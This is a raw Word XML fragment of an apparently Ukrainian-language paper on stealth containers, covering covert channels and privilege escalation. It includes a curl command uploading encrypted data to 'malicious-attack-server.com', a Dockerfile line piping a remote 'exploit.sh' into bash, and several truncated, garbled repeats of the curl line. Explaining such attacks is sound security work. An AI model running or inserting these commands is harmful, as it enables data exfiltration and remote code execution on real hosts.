          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> file:/root/.hidden/keyfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t># Надсилання зашифрованих даних через HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>data-binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> @/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>encrypted_data.enc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://malicious-attack-server.com/upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>data-binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> @/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>encrypted_data.enc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://malicious-attack-server.com/uploa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>data-binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> @/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>data-bi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST </w:t>
      </w:r>
      <w:r w:rsidR="001258F7" w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST </w:t>
      </w:r>
      <w:r w:rsidR="001258F7" w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X P </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRDefault="001258F7" w:rsidP="00BB02FF">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Для забезпечення зв’</w:t>
      </w:r>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>язку між стелс-контейнером і зловмисником викор</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>истовуються приховані канали зв’</w:t>
      </w:r>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">язку, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>які дозволяють уникнути виявленю</w:t>
      </w:r>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> з боку систем моніторингу та виявлення вторгнень. Це можуть бути як звичайні канали, так і нетипові для системи способи комунікації. Наприклад, можуть застосовуватися нестандартні порти або протоколи для мережевого трафіку, що дозволяє уникнути виявлення зв'язку через традиційні методи моніторингу мережі. Використання рідко застосовуваних портів або протоколів допомагає приховати трафік від стандартних систем безпеки, які фільтрують лише типові порти та протоколи. Крім того, для приховання комунікацій може використовуватись стеганографія, що дозволяє маскувати команди або дані всередині звичайних мережевих пакетів. Це робить трафік непомітним для систем виявлення вторгнень або інших інструментів моніторингу, оскільки інформація передається в зашифрованому вигляді або маскується, імітуючи звичайний мережевий трафік.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRDefault="001258F7" w:rsidP="00BB02FF">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3. </w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Ескалація привіле</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>їв та доступ до ресурсів хоста</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA3CCB" w:rsidRPr="003C7FE5" w:rsidRDefault="001258F7" w:rsidP="00A93F26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t># Використовуємо для ескалації привілеїв</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="00CA3CCB" w:rsidRDefault="001258F7" w:rsidP="00A93F26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>RUN</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>fsSL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00BB02FF" w:rsidP="00BB02FF">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BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Для того, щоб стелс-контейнер міг виконувати свої функції з мінімальним рівнем виявлення, він включа</w:t>
      </w:r>
      <w:r w:rsidR="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
